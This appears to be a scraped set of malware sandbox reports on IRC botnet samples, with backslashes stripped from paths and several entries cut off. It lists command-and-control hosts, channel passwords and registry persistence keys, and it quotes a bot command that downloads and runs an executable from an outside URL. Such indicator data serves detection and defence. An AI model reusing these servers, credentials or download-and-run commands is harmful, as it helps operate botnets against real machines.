– IRC Conversations: 94.47.254.1:6692 Nick: lswmOLdb Username: jryzondt Joined Channel: #0 Channel Topic for Channel #0: “=C1nNBnfNVDkkQRqxCbVec51gkackSc6brTZ” Topic By: [ ggbdg ]

keno.hizzibolla.com 69.42.218.75 Resolved : [keno.hizzibolla.com] To [69.42.218.75] C&C Server: 69.42.218.75:8878 Server Password: Username: iyicpazy Nickname: obZhzECbX Channel: #maxi (Password: ) Channeltopic: :=glRW7E+NAInKAWQQ9QNpMjm2/81PJzDl0ggaCl8I9h9tSzyjtM4cn6mC9aL1JrmzdqVs5/a9kXPXyRkv7CNtD6uKgjNKvUDhzc7e7bNqdGGL+T/DDRuqVsdOVnWpBdDPucbFYwN/AJyLkrYs9h6fLKN6q3x Topic By: [ eebab ] Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Background Intelligent Transfer Service” = C:Dokumente und EinstellungenAdministratorAnwendungsdatenbits.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “C:WINDOWSExplorer.EXE” = C:WINDOWSExplorer.EXE:*:Enabled:Background Intelligent Transfer Service Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”Read more...

ms.mobilerequests.com: type A, class IN, addr 89.149.223.140 udp port:1863 Startup: explorer.exe (PID: 776 MD5: 12896823FB95BFB3DC9B46BCAEDC9923) wscntfy.exe (PID: 676 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5) File created: C:RECYCLERS-1-5-21-5315288217-6398524660-645013835-9465 C:RECYCLERS-1-5-21-5315288217-6398524660-645013835-9465Desktop.ini Other file operations: C:RECYCLERS-1-5-21-5315288217-6398524660-645013835-9465

tes.stuckin.org: type A, class IN, addr 208.53.131.135 tes.memehehz.info: type A, class IN, addr 208.53.131.135 tes.enterhere2.biz: type A, class IN, addr 208.53.131.135 Startup: explorer.exe (PID: 776 MD5: 12896823FB95BFB3DC9B46BCAEDC9923) wscntfy.exe (PID: 676 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5) udp ports: 57134,4444 File Created: C:RECYCLERS-1-5-21-9031247443-7444027205-238249698-8303 C:RECYCLERS-1-5-21-9031247443-7444027205-238249698-8303Desktop.ini Memory written: 3 776 C:WINDOWSexplorer.exe 00980000 success or wait 1 8 776 C:WINDOWSexplorer.exe 00990000 success orRead more...

Resolved : [backup.kazeu.net] To [217.219.137.162] Resolved : [backup.kazeu.net] To [218.206.248.154] Resolved : [backup.kazeu.net] To [178.32.95.119] 178.32.95.119:23232 Nickname​: n[USA​|XPP|x32​|HANS]qe​bjljr User: 6625″” Joins ch​annel: :​#securit​y-check# Joins ch​annel: #​!icee PW​: ERROR Joins channel: :#!icee ..’..K..​’.?…E.​.

Remote Host Port Number 217.23.13.240 6374 NICK n{USA|XP}392156 USER 3921 “” “TsGh” :3921 JOIN #nade2# PONG :irc.NaDe.gov * The following port was open in the system: Port Protocol Process 1053 TCP hidserv.exe (%AppData%hidserv.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%hidserv.exe” so that hidserv.exe runs everyRead more...

Remote Host Port Number omgredrum.no-ip.biz 51987 Resolved : [omgredrum.no-ip.biz] To [69.65.19.117] Resolved : [omgredrum.no-ip.biz] To [69.65.19.116] PASS Virus NICK VirUs-aruhtp USER sntmwl “” “pup” :sntmwl Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122}] + StubPath = “c:RESTORES-1-5-21-1482476501-1644491937-682003330-1013RedruMx.exe” so thatRead more...

Remote Host Port Number 184.73.209.168 80 204.0.5.41 80 204.0.5.58 80 204.0.5.59 80 207.38.101.12 80 208.43.117.134 80 216.178.38.168 80 63.135.80.58 80 63.135.86.25 80 63.135.86.37 80 205.234.236.32 1234 PASS xxx NICK NEW-[USA|00|P|39592] USER XP-5696 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|39592] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requestedRead more...

nice.niceshot.in 67.202.108.130 C&C Server: 67.202.108.130:6567 PASS s1m0n3t4 Server Password: Username: XP-1204 Nickname: [SI|DEU|00|P|86096] Channel: #sucksusb# (Password: c1rc0dus0leil) Channeltopic: :.desfi http://iphoneate.in/salario/yem.exe c:WINDOWScap.exe 1 MODE [SI|USA|00|P|97963] -ix JOIN #update# c1rc0dus0leil PRIVMSG #update# :[Dl]: File download: 84.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_64066.exe @ 84.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|61951] USER XP-8990 * 0 :COMPUTERNAME MODE [SI|USA|00|P|61951] -ix JOINRead more...

Remote Host Port Number 74.208.43.209 5000 JOIN ##[ENG] JOIN #msn# PONG :4DFB1F08 NICK [V2][ENG][COMPUTERNAME]9523 PING :redc00de.no-ip.biz 00000000 | 5041 5353 200D 0A55 7365 7220 6B6B 6B20 | PASS ..User kkk 00000010 | 6B6B 6B20 6B6B 6B20 6B6B 6B20 3A6B 6B6B | kkk kkk kkk :kkk Registry Modifications * The newly created Registry Values are: oRead more...